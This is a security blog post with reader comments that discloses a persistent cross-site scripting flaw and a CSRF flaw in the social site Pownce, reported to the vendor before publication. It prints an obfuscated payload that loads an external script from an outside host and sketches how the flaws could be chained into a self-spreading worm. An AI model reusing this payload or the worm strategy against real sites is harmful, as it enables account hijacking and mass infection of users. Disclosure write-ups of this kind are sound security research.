The Pownce Worm (Yet Another Potential AJAX Worm)
First of all I need to let you know that it is not within our practice to disclose vulnerabilities on specific online applications. However, given the fact that Pownce, the vendor, was responsibly informed and the fact that we believe that the issue is interesting enough to be discussed, we’ve decided to let you know about our findings. First of all, what’s Pownce:
Pownce is a social networking and micro-blogging site started by Internet entrepreneurs Kevin Rose, Leah Culver, Daniel Burka, and Shawn Allen. Pownce is centered around sharing messages, files, events, and links with already-established friends. Much like Twitter.
Here is the story: A couple of days ago I was interested in putting together some research on client-side vulnerabilities found within Adobe AIR applications. The material was supposed to go into my Black Hat talk, which is happening on 27-28 March, btw. I’ve heard that Pownce’s IM client uses Adobe AIR, so I thought that this could be a perfect example I can make use of. Although, there are some very obvious vulnerabilities within the client, which I’ve tested offline btw, I noticed that parts of the requests delivered from the server does not seem to be sanitized at all. After further investigation, I noticed that my personal profile is vulnerable to attack known as Persistent Cross-site Scripting, which is the most serious type of all Cross-site Scripting attacks.
The Cross-Site Scripting condition occurs within a very obscure place and it is restricted to 16 characters. Because of the space restrictions, I was able only inject things like <script>alert(1) and this was pretty much it. Obviously, this is not enough for even an alert(1) command, so other methods for execution were needed in order to make the vector successfully exploitable.
After scratching my head for a few minutes, I figured out that there is user-supplied data between the area of injection and the bottom of the page. Though, the input fields that control that data successfully sanitize HTML meta characters. Although, we are restricted in terms of space, attackers can make use of limited XSS injection issue combined with the extra sanitized user-supplied data in order to cause a successful persistent Cross-site Scripting. Let’s examine the following diagram:
[html junk]
[point of injection; 16 chars max]
[html junk]
[correctly sanitized, safely rendered user-supplied data]
[html junk]So, in order to store the attack, we need to inject something within the 16 characters that will make the rest up to the [correctly sanitized, safely rendered user-supplied data] block under the attacker’s control. Here how it is done:
[html junk]
*/<script>/*
[html junk]
*/ XSS Payload which does not need to contain HTML meta characters /*
[html junk]Do you see the magic? After the <script> tag we start a JavaScript comment block (/*). The block continues down the page source code until it reaches the character */ which are part of the [correctly sanitized, safely rendered user-supplied data] block. This user-supplied field is much bigger and contain up to 160 characters, which is enough for injecting an external script, which on its own can deliver as much malicious functionalities within the infected profile as needed. Let’s examine the diagram of demonstration attack which I wrote and deliberately made it work only for Firefox and limited to the logged in user which profile was affected:
[html junk]
*/<script>/*
[html junk]
*/document.write(atob(/PHNjcmlwdCBzcmM9Imh0dHA6Ly9ja2Vycy5vcmcvcyI+PC9zY3JpcHQ+PCEtLQ==/.toString().substr(1,56)));/*
[html junk]There you go. The Injection Point and the XSSed profile look like like screens bellow:
Unfortunately there is more to that. The profile page is also vulnerable to Cross-site Request Forgery attacks. This means that if the user is logged in and he/she visits a malicious site, they will get infected permanently with the provided evil logic. I am not planning to spend time explaining why is that a problem.
The AJAX Worms
The first question is whether the vulnerability is wormable. Obviously, it is. Not to mention that it is even trivially exploitable via CSRF. This means that attackers would have probably initiated two different strategies. The first one will be kind the typical AJAX Worm implements, i.e. propagate through profile infections. The second strategy is weirder. Because each profile can be easily modified via CSRF, attacker would have launched a gigantic campaign in which hundreds upon thousands of malicious links will be spread across the network. Once unaware users visit them, they will get exploited and their account will be infected with the worm code. By using both strategies simultaneously, attackers can reach a network domination before the good guys find out what’s going on. The good thing is that we caught the problem before becoming a disaster.
Disclaimer
GNUCITIZEN is a Cutting-edge, Ethical Hacker Outfit, Information Think Tank, which primarily deals with all aspects of the art of hacking. GNUCITIZEN’s work has been featured in established magazines and information portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and many others. The members of the GNUCITIZEN group are well known and respected experts in the Information Security and Negative Public Relations (PR) Industries, with widely recognized experience in the government and corporate sectors and the open source community.
GNUCITIZEN is one of the most influential organizations of its kind, reaching thousands of users every day and having a strong relationship with numerous printed and web-based media outlets. Part of our mission is to let others succeed the same way GNUCITIZEN did. Therefore, if you have a research or an interesting information you would like to share, 
comments
Last time I checked “Cutting-edge” didn’t mean “known more than a year ago”.
http://sla.ckers.org/forum/read.php?3,2073
http://sla.ckers.org/forum/read.php?3,4030
http://sla.ckers.org/forum/read.php?13,2033
amazing find, thnx pdp :) and /* */ it’s just great way
and what exactly is your point kuza? it is disappointing to see u bragging about a method over an actual vulnerability or you haven’t read the most important part of the post - the title? Let me highlight that for u: The Pownce Worm (Yet Another Potential AJAX worm).
My point pdp, is that you haven’t posted anything new. Your “magic” is not new, the fact that we can easily write XSS worms is not new, the fact that we can worm some CSRF holes is not new, and the fact that you’re not posting anything new isn’t new any more either.
So please; either post something new or don’t post anything at all, posting about the fact that a site was vulnerable to a known technique is just being an attention whore.
P.S. To me, methods and techniques are usually considerably more interesting than specific vulnerabilities and exploits since most exploits and vulnerabilities, especially on the web, require no innovation to identify or exploit.
and my point is that you should post more constructive comments.
According to your statement we all should stop looking for vulnerabilities simply becouse most of them come down to imput validation. Does that sound reasonable, kuza? And who said that the technique is new? It is xss - known to some for a decade! And who is an attention whore really? You come about pointing to links which has nothing to do with the purpose of the post. I am discussing an issue which could have turned into a worm. You are bragging about how to do html injection.
Regarding the new thing: the vulnerability is new, xss attacks are old. So, grow up.
Aaack! If you’re going to inflict us with a picture of Sylvester Stallone in a wig and an Hawaiian shirt, at LEAST give us a barf-bag first! :-D
well, credits due to RSnake for coming with this brilliant proof of concept script. 10x R… it works well.
This has been fixed already.
yes leah, the vendor (Pownce) was responsibly contacted about the issue and a patch was released to cover the whole before we’ve made our findings public. but just to stress out so that everybody knows.
Your right, my first comment wasn’t very constructive, it was meant to show people that you’re just a hack, not a hacker.
But I think my second comment was pretty constructive: “post something new or don’t post anything at all”.
Anyway, to answer your question; we shouldn’t stop looking for input validation vulnerabilities, we should just stop bragging about finding them.
And in this case you can’t even pretend that the existence of a vulnerability in this website is important to anyone any more; it’s a custom website which has now been patched, end of story.
If you honestly think you were “discussing an issue which could have turned into a worm”, you’re deluding yourself, there is no discussion going on here, only you trying to garner more of the attention you seem to crave. But maybe I’m wrong; by all means go ahead and “discuss” your vulnerability, prove me wrong and talk about something new.
Just a tip though; last time I checked, discussing something involved more than one person bragging and others trying to suck up.
I thought this was a cool read and something we should all look out for while making Air apps. Thanks for the post!
@kuza55
As far as your claim that I am an attention whore, I am not the one trying to gain popularity by mocking (unsuccessfully) established security professionals like myself and especially RSnake, to whom you proved that you are nothing more but a lame script kiddie. So, please do us a favor, and stop wasting our time.
Nice job. I mentioned Pownce in my blog earlier this week as one of the applications that corporate information security people need to worry about.
http://infosecnirvana.blogspot.....-leak.html
This is a nice example of combining two vectors in order to accomplish fully working JS injection: an unfiltered - but limited by length - field, and a filtered but unlimited by length field.
Hmmm, perhaps I’m missing something. I see how you use a start SCRIPT tag and then a code comment to blank everything between the injection point and the “user supplied but sanitized” data. I also see how us end the “user supplied but sanitized” data with a code comment to blank out everything after the “user supplied but sanitized.”
But where is the end script tag? You JavaScript will not run unless the SCRIPT tag is closed. And assuming there is a end SCRIPT tag on the page after your “user supplied but sanitized” data, you will get an unterminated comment syntax error for that script block. The only way this will work is if there is a script tag later in the page that has a closing code comment AND the rest of the code will not invoke a syntax error
I hope this is making sense! Take a look at the HTML on http://msblabs.org/filedump/frag.html
The injected code alert(555) can only run because later in the HTML their is a SCRIPT block that can close both the open code comment and the open SCRIPT tag. Was that the case in the site you were exploiting?
Acidus, your question makes perfect sense. There is a second
<script></script>text entry which closes both and fixes the code so that it runs perfectly fine. However, in some cases like where the profile needs to be xssed for unauthenticated users you have to use*/<script>/*as this strings is repeated several times across the page. And you need to do that because of a Google Analytics breaking the end of script and making the code not executing at all. But as I said this is only applicable for unauthenticated users. Does that make sense? I guess it needs more detailed explanation.got it. thanks
I found plaxo.com also xssable and wormable when I test simple and plain xss stream as to First Name entry field.
This is not working with every browser.
Because atob() is not standard in JavaScript. Probably it could work withe unescape().
true, the POC was written exclusively for FF.